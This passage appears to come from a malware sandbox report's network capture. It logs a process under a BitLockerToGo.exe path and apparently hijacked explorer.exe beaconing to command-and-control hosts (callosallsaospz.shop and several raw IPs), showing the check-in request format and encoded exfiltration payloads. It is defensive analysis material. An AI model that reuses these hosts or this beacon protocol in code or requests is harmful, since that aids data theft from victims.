                                                                              26192.168.2.449793188.114.97.34437784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:43 UTC268OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 77
                                                                              Host: callosallsaospz.shop
                                                                              2024-07-27 12:53:43 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 32 43 32 36 30 43 33 46 46 35 33 41 36 41 32 36 42 32 36 32 33 42 44 38 41 41 31 32 34 30 34
                                                                              Data Ascii: act=get_message&ver=4.0&lid=bOKHNM--&j=&hwid=F2C260C3FF53A6A26B2623BD8AA12404
                                                                              2024-07-27 12:53:45 UTC816INHTTP/1.1 200 OK
                                                                              Date: Sat, 27 Jul 2024 12:53:45 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9uekljgq0t5ojr4h6obbnj7m80; expires=Wed, 20-Nov-2024 06:40:23 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ulWk3kGMo5LlfLSgUpnwIuRdcIxrQe0TyREjQtunOwcwXsqoLKq41aie4kyuME%2FrSH4RZGUkI36xvOHX%2B%2Ft%2BJVhLvhVQK8g4MpFpKHkQbL%2F0Ah%2FWTy631GaY18lKlNB%2BobCYoN9jfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a9cc625a98bc33b-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-27 12:53:45 UTC54INData Raw: 33 30 0d 0a 55 78 49 53 35 74 56 75 7a 59 4f 47 56 71 55 4e 32 74 4c 31 35 76 6e 33 51 47 44 75 62 46 78 78 59 37 2f 59 5a 6c 2b 4d 70 46 55 49 54 77 3d 3d 0d 0a
                                                                              Data Ascii: 30UxIS5tVuzYOGVqUN2tL15vn3QGDubFxxY7/YZl+MpFUITw==
                                                                              2024-07-27 12:53:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.449794107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:44 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:53:44 UTC1267OUTData Raw: 56 7a 47 55 49 6a 71 4e 34 6b 7a 5a 38 67 4e 58 4f 48 4f 5a 48 78 6c 47 4a 74 4e 2f 73 79 55 2f 66 6f 35 5a 37 6a 73 37 46 39 59 4f 4a 58 50 71 6e 70 75 6b 67 73 4e 6d 79 6c 48 65 50 43 2f 4d 34 72 53 31 76 6f 67 63 50 6a 34 64 62 41 51 56 55 31 6c 66 7a 50 67 76 62 45 50 62 41 65 71 68 4f 62 78 6c 75 67 79 54 4e 4b 4e 6c 77 75 46 6b 32 6a 63 31 57 47 36 6a 46 2b 47 4c 54 76 41 2b 43 46 2f 4a 5a 30 6d 4a 4d 6d 41 57 6b 51 54 56 74 6d 35 30 65 42 33 45 2f 5a 67 2f 69 7a 68 6f 65 30 70 50 48 50 4a 53 70 6a 2b 6b 58 4d 39 4c 35 75 4a 34 74 65 5a 57 6c 36 78 38 45 46 42 44 79 70 51 6d 50 6c 48 4e 66 39 32 4f 4b 7a 47 71 61 68 65 56 6b 49 59 79 4b 57 69 7a 43 70 6d 79 76 57 71 6e 58 6d 66 42 6c 4b 33 74 79 37 66 6e 2f 78 6d 39 7a 6e 7a 64 64 4e 59 71 78 6b 30
                                                                              Data Ascii: VzGUIjqN4kzZ8gNXOHOZHxlGJtN/syU/fo5Z7js7F9YOJXPqnpukgsNmylHePC/M4rS1vogcPj4dbAQVU1lfzPgvbEPbAeqhObxlugyTNKNlwuFk2jc1WG6jF+GLTvA+CF/JZ0mJMmAWkQTVtm50eB3E/Zg/izhoe0pPHPJSpj+kXM9L5uJ4teZWl6x8EFBDypQmPlHNf92OKzGqaheVkIYyKWizCpmyvWqnXmfBlK3ty7fn/xm9znzddNYqxk0
                                                                              2024-07-27 12:53:46 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:45 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:46 UTC685INData Raw: 6d 76 47 34 4b 35 69 4e 72 33 35 75 44 42 49 6a 4c 63 31 4e 48 41 6e 59 36 43 68 49 56 34 52 49 7a 37 51 34 45 45 66 73 4b 63 5a 6b 58 61 59 46 78 69 39 71 6e 36 32 76 65 72 42 42 58 50 51 71 7a 65 58 45 78 77 64 4d 35 51 50 47 35 4c 44 69 62 33 66 32 78 70 69 2f 53 6d 71 6d 6d 70 38 49 58 4b 77 68 45 44 68 61 50 7a 4e 6d 31 2b 4d 72 42 69 47 34 75 2f 61 4c 45 56 4b 48 71 72 73 47 38 36 6d 6a 30 54 6a 55 6b 57 68 4c 44 4a 4e 2f 53 74 71 61 38 34 75 43 36 35 42 55 64 31 53 68 4e 33 31 4a 74 34 45 6b 54 74 41 67 53 31 39 35 79 55 39 7a 73 6f 65 69 73 35 66 72 4a 75 7a 49 6f 5a 76 52 74 4e 54 70 64 4c 6a 67 72 44 49 4e 52 39 62 6c 66 33 59 47 4f 35 38 6f 77 58 6a 69 30 57 2b 78 33 54 6b 38 70 73 61 57 66 49 79 6c 75 49 58 65 67 41 67 30 69 55 74 47 44 35 30
                                                                              Data Ascii: mvG4K5iNr35uDBIjLc1NHAnY6ChIV4RIz7Q4EEfsKcZkXaYFxi9qn62verBBXPQqzeXExwdM5QPG5LDib3f2xpi/Smqmmp8IXKwhEDhaPzNm1+MrBiG4u/aLEVKHqrsG86mj0TjUkWhLDJN/Stqa84uC65BUd1ShN31Jt4EkTtAgS195yU9zsoeis5frJuzIoZvRtNTpdLjgrDINR9blf3YGO58owXji0W+x3Tk8psaWfIyluIXegAg0iUtGD50


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.449795167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:46 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:53:46 UTC1267OUTData Raw: 62 79 51 75 4d 73 46 4d 56 6a 36 62 65 52 69 36 44 48 58 53 59 46 72 77 4a 2f 69 39 2b 37 6d 71 72 48 34 4e 6a 42 32 73 4a 2f 4c 42 41 62 2b 56 49 66 50 6a 54 7a 43 56 57 4c 2f 34 5a 38 44 62 6d 52 6a 61 6c 6c 30 30 6b 36 38 44 4c 59 7a 75 4e 64 33 76 74 35 39 4d 43 56 39 48 6a 34 67 4c 71 4c 4f 61 6b 30 6a 42 76 2f 45 72 71 51 67 48 77 33 57 4a 43 66 58 47 35 2f 51 79 2f 44 46 65 2b 33 65 4b 6d 4b 69 47 49 73 59 47 6b 68 42 77 6b 38 73 6f 4b 48 38 48 78 2b 69 4e 70 56 52 4f 42 73 59 2f 48 50 55 7a 57 62 5a 49 4e 56 6b 4c 64 58 76 41 4e 4c 72 33 57 74 47 44 6f 65 6e 30 54 75 4f 59 7a 63 76 47 49 62 33 62 47 55 56 32 72 50 6e 73 61 7a 43 68 6d 32 76 65 30 61 2f 63 64 6a 57 67 39 31 50 32 45 7a 5a 63 41 49 61 67 51 6b 39 37 4c 38 45 4e 39 6e 41 65 6b 4c 50
                                                                              Data Ascii: byQuMsFMVj6beRi6DHXSYFrwJ/i9+7mqrH4NjB2sJ/LBAb+VIfPjTzCVWL/4Z8DbmRjall00k68DLYzuNd3vt59MCV9Hj4gLqLOak0jBv/ErqQgHw3WJCfXG5/Qy/DFe+3eKmKiGIsYGkhBwk8soKH8Hx+iNpVROBsY/HPUzWbZINVkLdXvANLr3WtGDoen0TuOYzcvGIb3bGUV2rPnsazChm2ve0a/cdjWg91P2EzZcAIagQk97L8EN9nAekLP
                                                                              2024-07-27 12:53:47 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:47 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:47 UTC685INData Raw: 58 6c 30 45 6c 62 63 4a 62 42 50 73 47 48 58 4b 74 4f 51 78 47 5a 67 49 59 57 2b 44 7a 35 56 68 78 34 35 74 6c 52 78 39 58 33 6c 34 4c 50 39 30 62 30 63 5a 54 55 54 67 45 51 31 52 45 64 39 64 6b 79 49 49 55 53 61 43 36 4f 6c 4f 74 59 46 6b 50 5a 69 76 73 30 53 6c 33 5a 36 4c 6e 6c 47 73 71 53 47 32 73 32 4a 55 31 58 47 4c 6e 49 56 41 69 4d 53 31 34 56 6b 44 51 62 6d 4e 73 6a 36 75 38 68 6e 4c 65 34 73 37 79 7a 6f 53 43 51 58 6c 6c 53 51 47 50 4a 65 55 52 50 63 54 77 76 35 6c 75 45 39 43 45 6f 54 33 38 4d 38 5a 64 4c 45 74 51 6d 47 2f 66 70 42 2f 69 38 61 70 47 71 51 67 67 73 62 72 43 50 49 57 5a 6c 79 7a 33 74 78 50 74 34 66 4a 34 33 55 71 58 68 73 76 67 31 6e 48 5a 53 37 45 64 58 6b 74 79 35 57 71 6a 64 43 42 58 37 68 56 4e 36 79 65 48 56 79 30 63 79 4f
                                                                              Data Ascii: Xl0ElbcJbBPsGHXKtOQxGZgIYW+Dz5Vhx45tlRx9X3l4LP90b0cZTUTgEQ1REd9dkyIIUSaC6OlOtYFkPZivs0Sl3Z6LnlGsqSG2s2JU1XGLnIVAiMS14VkDQbmNsj6u8hnLe4s7yzoSCQXllSQGPJeURPcTwv5luE9CEoT38M8ZdLEtQmG/fpB/i8apGqQggsbrCPIWZlyz3txPt4fJ43UqXhsvg1nHZS7EdXkty5WqjdCBX7hVN6yeHVy0cyO


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.449796107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:48 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:53:48 UTC1267OUTData Raw: 5a 36 6a 64 7a 74 38 67 64 69 48 6d 76 71 6e 37 4a 76 67 34 7a 67 2f 51 70 77 55 31 67 65 65 56 74 76 53 4d 4a 49 5a 46 52 66 4b 49 47 69 69 6a 69 64 47 62 2f 46 64 53 34 42 66 35 72 49 61 45 69 58 52 46 39 57 72 49 77 30 49 67 45 50 6a 72 7a 2b 68 59 73 71 30 47 35 33 6d 33 31 72 71 67 68 63 33 57 42 4a 7a 35 39 66 55 2f 65 43 59 56 58 4d 63 57 44 48 6e 55 51 71 65 30 30 6d 4c 45 41 75 53 30 75 54 50 78 30 61 43 48 49 34 2b 41 70 47 79 32 71 38 5a 4e 50 57 43 34 74 63 55 36 6e 6c 46 52 58 59 31 31 48 57 7a 34 4d 45 56 69 4c 45 76 66 4f 41 65 67 41 36 67 6a 4f 72 38 61 62 46 32 78 52 33 57 52 74 67 64 4d 43 6f 45 4a 76 78 69 44 7a 6a 43 2f 5a 2b 4f 44 4b 52 64 37 53 78 44 55 52 4a 72 70 33 66 44 38 72 75 35 76 34 68 73 6c 74 6d 4c 43 79 43 36 78 39 55 6c
                                                                              Data Ascii: Z6jdzt8gdiHmvqn7Jvg4zg/QpwU1geeVtvSMJIZFRfKIGiijidGb/FdS4Bf5rIaEiXRF9WrIw0IgEPjrz+hYsq0G53m31rqghc3WBJz59fU/eCYVXMcWDHnUQqe00mLEAuS0uTPx0aCHI4+ApGy2q8ZNPWC4tcU6nlFRXY11HWz4MEViLEvfOAegA6gjOr8abF2xR3WRtgdMCoEJvxiDzjC/Z+ODKRd7SxDURJrp3fD8ru5v4hsltmLCyC6x9Ul
                                                                              2024-07-27 12:53:49 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:49 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:49 UTC685INData Raw: 64 54 58 54 38 48 52 6a 31 7a 35 4a 39 42 7a 70 7a 62 4e 70 46 42 73 71 50 6c 45 2f 75 6b 73 42 4e 4a 50 67 73 33 33 64 53 68 6b 53 4d 54 62 58 31 65 57 30 30 77 48 2f 4b 6b 42 47 71 65 64 52 72 6d 69 35 55 49 48 65 35 64 4b 61 30 61 48 77 74 37 37 45 42 5a 53 6b 64 39 46 6b 6b 44 34 6e 52 43 74 31 46 65 77 42 55 41 47 35 55 77 50 70 64 4b 6a 72 71 75 61 4c 77 4c 57 4c 4c 52 4f 41 4b 34 74 45 69 49 72 71 55 62 53 38 6c 31 63 59 51 46 4f 45 49 34 6c 6c 33 4d 78 45 58 37 54 55 4a 32 58 49 70 64 63 73 4f 2b 45 49 6f 6d 66 38 61 37 78 58 68 30 45 4f 53 38 49 66 56 69 39 49 39 77 2f 64 58 54 64 6a 6c 6d 4f 4c 32 39 42 57 4e 45 66 4b 54 72 6c 5a 4b 69 53 51 45 4e 6c 36 41 78 6d 4d 4c 57 76 4f 64 54 42 30 48 79 31 37 36 4e 77 2b 62 76 6d 77 6e 78 42 69 6a 69 63
                                                                              Data Ascii: dTXT8HRj1z5J9BzpzbNpFBsqPlE/uksBNJPgs33dShkSMTbX1eW00wH/KkBGqedRrmi5UIHe5dKa0aHwt77EBZSkd9FkkD4nRCt1FewBUAG5UwPpdKjrquaLwLWLLROAK4tEiIrqUbS8l1cYQFOEI4ll3MxEX7TUJ2XIpdcsO+EIomf8a7xXh0EOS8IfVi9I9w/dXTdjlmOL29BWNEfKTrlZKiSQENl6AxmMLWvOdTB0Hy176Nw+bvmwnxBijic


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.449797107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:50 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:53:50 UTC1122OUTData Raw: 66 67 6a 41 6f 4a 35 6c 70 35 65 39 71 78 42 64 32 74 6f 6f 54 52 41 35 79 69 33 54 65 56 65 4a 77 68 73 66 31 30 48 74 54 41 31 33 2b 6c 34 69 71 48 66 7a 74 79 46 4c 6c 45 74 35 55 6b 38 72 4d 74 57 33 79 77 42 35 56 55 69 43 4d 79 37 47 63 70 43 31 4d 68 6e 32 2b 31 4a 47 4b 57 47 45 64 43 35 5a 59 6c 37 4c 49 77 65 51 69 7a 55 42 57 4e 78 32 44 4e 62 72 5a 30 61 6e 58 44 6b 68 38 43 49 33 79 32 52 6a 71 72 51 6f 63 56 33 4f 4e 66 7a 74 72 4d 45 54 58 46 4c 4c 6e 66 57 39 36 6b 44 56 4b 63 36 35 4b 42 6c 36 58 42 67 6d 50 66 66 6e 6c 47 2b 79 39 55 65 2f 76 66 58 46 4f 73 7a 45 35 76 33 73 76 52 68 59 6e 39 71 51 34 38 74 49 6b 55 71 57 56 34 2b 74 4d 38 38 44 46 39 64 58 52 6a 32 44 50 30 34 71 66 42 55 64 62 62 55 53 43 63 51 35 71 65 54 32 52 5a 57
                                                                              Data Ascii: fgjAoJ5lp5e9qxBd2tooTRA5yi3TeVeJwhsf10HtTA13+l4iqHfztyFLlEt5Uk8rMtW3ywB5VUiCMy7GcpC1Mhn2+1JGKWGEdC5ZYl7LIweQizUBWNx2DNbrZ0anXDkh8CI3y2RjqrQocV3ONfztrMETXFLLnfW96kDVKc65KBl6XBgmPffnlG+y9Ue/vfXFOszE5v3svRhYn9qQ48tIkUqWV4+tM88DF9dXRj2DP04qfBUdbbUSCcQ5qeT2RZW
                                                                              2024-07-27 12:53:51 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:51 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:51 UTC685INData Raw: 58 58 6c 69 67 57 62 72 7a 79 78 69 48 4b 4f 66 41 58 2f 64 7a 55 51 63 4b 59 33 44 6a 79 77 41 70 2f 35 32 73 63 6a 4f 76 36 4d 41 4a 42 58 74 71 69 55 53 64 31 39 4a 47 51 66 78 47 52 62 7a 53 6a 61 2b 7a 66 34 45 62 32 79 48 6a 50 6f 54 55 62 32 46 58 79 6a 72 52 6a 39 6d 69 42 4a 4f 4d 44 32 75 79 2f 44 79 77 69 61 56 6e 66 70 4c 6e 38 51 62 67 2b 62 41 46 55 78 61 34 68 4c 6b 34 45 2b 32 33 43 6c 58 71 59 54 31 44 2b 4c 53 67 38 37 53 36 71 54 76 7a 4b 64 57 62 72 45 43 6c 37 6f 4d 48 53 55 2f 35 42 70 62 4d 53 4c 62 73 2b 78 4a 36 4f 4b 6a 74 2b 67 79 56 66 76 65 48 6d 4a 72 41 6a 65 36 36 76 55 48 47 6c 78 75 39 6c 34 41 72 52 59 2b 46 6e 46 71 48 33 71 33 6b 2b 44 6c 63 76 50 74 4c 69 63 73 46 47 64 73 34 54 58 6c 49 69 4f 5a 6a 61 31 53 4e 61 38
                                                                              Data Ascii: XXligWbrzyxiHKOfAX/dzUQcKY3DjywAp/52scjOv6MAJBXtqiUSd19JGQfxGRbzSja+zf4Eb2yHjPoTUb2FXyjrRj9miBJOMD2uy/DywiaVnfpLn8Qbg+bAFUxa4hLk4E+23ClXqYT1D+LSg87S6qTvzKdWbrECl7oMHSU/5BpbMSLbs+xJ6OKjt+gyVfveHmJrAje66vUHGlxu9l4ArRY+FnFqH3q3k+DlcvPtLicsFGds4TXlIiOZja1SNa8


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.449798167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:52 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:53:52 UTC1267OUTData Raw: 69 4f 30 42 43 46 61 33 30 31 56 2f 33 55 4f 6d 68 4b 6d 51 30 31 53 5a 57 5a 79 6e 6b 41 72 50 64 79 65 44 37 6e 54 42 47 33 6b 39 78 4b 4c 43 31 2b 4b 52 63 31 33 4d 54 32 66 55 4c 6c 62 43 6b 65 73 4b 63 55 31 6f 6f 34 6d 69 67 59 42 66 76 4f 2f 6e 46 62 6f 68 2f 33 79 74 6c 6a 4d 36 42 57 75 54 65 57 4a 61 36 73 4d 57 6c 7a 7a 39 4f 61 74 4e 33 30 58 6c 45 5a 42 36 51 44 44 6b 77 49 44 74 4f 32 77 53 77 66 44 45 39 36 52 61 51 43 63 57 4c 38 52 51 5a 38 74 4a 4f 45 47 46 62 36 6d 5a 46 56 54 6a 7a 35 6b 55 6a 42 62 63 43 32 46 2b 63 68 51 4e 47 35 32 6e 55 5a 78 71 4d 31 6d 52 53 49 43 75 77 78 41 71 7a 54 57 56 43 53 64 6e 6c 37 72 6a 71 77 76 62 63 59 64 76 6c 6c 35 2b 35 58 71 48 4b 41 62 4f 4e 70 77 43 78 48 4a 6f 50 4c 43 63 31 43 6a 6d 74 31 6a
                                                                              Data Ascii: iO0BCFa301V/3UOmhKmQ01SZWZynkArPdyeD7nTBG3k9xKLC1+KRc13MT2fULlbCkesKcU1oo4migYBfvO/nFboh/3ytljM6BWuTeWJa6sMWlzz9OatN30XlEZB6QDDkwIDtO2wSwfDE96RaQCcWL8RQZ8tJOEGFb6mZFVTjz5kUjBbcC2F+chQNG52nUZxqM1mRSICuwxAqzTWVCSdnl7rjqwvbcYdvll5+5XqHKAbONpwCxHJoPLCc1Cjmt1j
                                                                              2024-07-27 12:53:53 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:53 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:53 UTC685INData Raw: 4f 77 6f 71 4e 46 70 52 32 2f 62 55 4a 43 66 32 65 63 55 48 43 56 51 61 43 35 6b 74 4a 62 68 6c 62 61 2b 48 48 58 6f 72 78 58 6c 31 72 78 64 74 79 38 51 34 70 76 7a 5a 68 77 55 66 4a 76 39 34 6f 2b 41 33 67 47 49 6e 4b 6a 72 2f 33 46 79 64 68 4c 74 77 6c 56 59 30 54 51 39 4a 78 34 71 64 61 4b 54 49 45 4d 4f 68 42 6e 62 4c 4d 39 63 71 4e 4e 62 68 2b 58 6f 6c 39 68 51 52 56 4a 48 35 6a 7a 45 32 58 41 39 54 4f 47 45 5a 32 6b 4d 78 56 72 47 73 55 56 55 7a 63 66 68 63 4c 6e 34 57 31 35 76 6d 37 58 5a 45 63 63 6c 73 6d 56 69 63 31 36 31 46 37 69 2b 63 62 30 2b 6c 43 54 38 4d 6e 71 32 4d 44 53 41 33 4b 65 33 41 78 69 2f 69 31 41 62 55 35 4b 64 2f 70 6f 76 45 43 42 46 45 32 43 7a 47 49 34 4f 42 44 4c 61 54 68 46 59 6e 52 76 79 4a 46 6b 63 6e 41 46 61 2f 31 69 4e
                                                                              Data Ascii: OwoqNFpR2/bUJCf2ecUHCVQaC5ktJbhlba+HHXorxXl1rxdty8Q4pvzZhwUfJv94o+A3gGInKjr/3FydhLtwlVY0TQ9Jx4qdaKTIEMOhBnbLM9cqNNbh+Xol9hQRVJH5jzE2XA9TOGEZ2kMxVrGsUVUzcfhcLn4W15vm7XZEcclsmVic161F7i+cb0+lCT8Mnq2MDSA3Ke3Axi/i1AbU5Kd/povECBFE2CzGI4OBDLaThFYnRvyJFkcnAFa/1iN


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              32192.168.2.449799107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:54 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:53:54 UTC1267OUTData Raw: 6f 6f 76 63 5a 76 49 58 6a 7a 6a 6e 61 68 39 59 6c 70 61 41 33 6b 69 35 46 77 7a 64 2f 56 4a 72 7a 39 56 4f 46 32 70 69 49 68 51 4f 79 32 74 59 34 38 64 54 4b 49 6a 74 78 66 31 64 74 64 6f 32 45 47 35 62 6b 74 52 33 67 30 64 55 33 2b 39 70 55 33 56 53 51 63 46 72 30 57 64 36 58 34 32 44 32 61 75 76 76 30 62 51 33 2f 55 30 59 52 6b 70 53 64 76 41 4b 30 65 76 73 34 46 76 47 76 39 53 5a 78 56 79 67 4c 5a 67 4a 67 4b 42 70 75 32 62 67 63 55 4a 2b 6b 67 51 73 74 42 42 64 53 2b 32 4c 71 41 75 6d 30 4d 33 6e 52 4f 41 63 72 2f 6e 6c 64 52 59 4f 4b 77 50 58 61 4c 75 69 6e 66 39 36 65 4d 62 6c 61 6d 31 35 46 39 4a 66 78 65 43 7a 77 70 4a 36 78 63 42 66 49 55 41 38 61 63 77 45 4d 4b 5a 37 54 41 72 51 79 4d 65 54 47 44 63 78 51 39 67 4b 67 61 61 65 38 63 73 30 30 32
                                                                              Data Ascii: oovcZvIXjzjnah9YlpaA3ki5Fwzd/VJrz9VOF2piIhQOy2tY48dTKIjtxf1dtdo2EG5bktR3g0dU3+9pU3VSQcFr0Wd6X42D2auvv0bQ3/U0YRkpSdvAK0evs4FvGv9SZxVygLZgJgKBpu2bgcUJ+kgQstBBdS+2LqAum0M3nROAcr/nldRYOKwPXaLuinf96eMblam15F9JfxeCzwpJ6xcBfIUA8acwEMKZ7TArQyMeTGDcxQ9gKgaae8cs002
                                                                              2024-07-27 12:53:55 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:53:55 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:53:55 UTC685INData Raw: 69 39 59 72 56 30 34 2b 6c 67 43 33 48 70 48 2b 45 51 2f 32 57 41 41 35 41 37 74 48 6d 75 68 79 34 45 57 59 43 32 46 50 58 38 64 65 43 63 56 43 58 5a 48 2b 35 48 31 75 6e 73 72 63 6c 44 30 33 4c 48 4b 76 68 4f 4b 7a 79 74 68 69 63 78 75 6f 38 31 2b 55 6a 46 34 53 55 53 68 69 42 44 69 75 30 70 67 44 6f 43 4e 59 49 44 58 6d 6f 73 7a 72 47 4d 43 31 56 2b 63 35 2b 61 49 2f 47 56 54 39 74 63 6f 57 54 6b 69 6f 4a 70 48 76 33 4c 71 7a 32 53 2f 43 31 76 54 73 56 70 68 49 31 48 57 75 68 57 39 42 46 49 76 70 34 4b 70 77 30 61 74 74 6a 4b 6e 74 48 71 67 6e 62 48 64 71 4b 74 71 50 4a 79 54 48 46 62 66 6e 6c 78 76 4e 32 50 77 70 32 32 4d 48 4e 4b 35 4a 6c 42 65 49 48 50 6c 46 67 63 4c 70 63 59 32 46 63 55 35 6d 51 77 50 54 4e 55 72 4d 37 55 54 58 69 41 51 6d 71 63 46
                                                                              Data Ascii: i9YrV04+lgC3HpH+EQ/2WAA5A7tHmuhy4EWYC2FPX8deCcVCXZH+5H1unsrclD03LHKvhOKzythicxuo81+UjF4SUShiBDiu0pgDoCNYIDXmoszrGMC1V+c5+aI/GVT9tcoWTkioJpHv3Lqz2S/C1vTsVphI1HWuhW9BFIvp4Kpw0attjKntHqgnbHdqKtqPJyTHFbfnlxvN2Pwp22MHNK5JlBeIHPlFgcLpcY2FcU5mQwPTNUrM7UTXiAQmqcF


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              33192.168.2.449800107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:56 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
